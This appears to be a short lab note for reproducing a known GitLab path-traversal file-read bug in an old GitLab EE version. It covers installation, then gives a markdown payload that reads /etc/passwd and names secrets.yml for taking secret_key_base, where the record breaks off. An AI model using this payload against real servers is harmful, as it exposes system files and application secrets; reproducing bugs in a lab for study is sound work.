Reference:
https://hackerone.com/reports/827052
Download of the affected version:
https://packages.gitlab.com/gitlab/gitlab-ee/packages/ubuntu/xenial/gitlab-ee_12.8.7-ee.0_amd64.deb
wget --content-disposition https://packages.gitlab.com/gitlab/gitlab-ee/packages/ubuntu/xenial/gitlab-ee_12.8.7-ee.0_amd64.deb/download.deb
wget --content-disposition https://packages.gitlab.com/gitlab/gitlab-ee/packages/ubuntu/focal/gitlab-ee_14.3.5-ee.0_amd64.deb/download.deb
sudo dpkg -i gitlab-ee_12.8.7-ee.0_amd64.deb
Then start it:
sudo gitlab-ctl reconfigure
Check the status of each GitLab component (and follow the Rails log):
sudo gitlab-ctl status
sudo gitlab-ctl tail gitlab-rails
Reference:
https://www.iteye.com/blog/hai0378-2366869
Demo
payload:
![a](/uploads/11111111111111111111111111111111/../../../../../../../../../../../../../../etc/passwd)
/opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml
Obtain secret_key_base: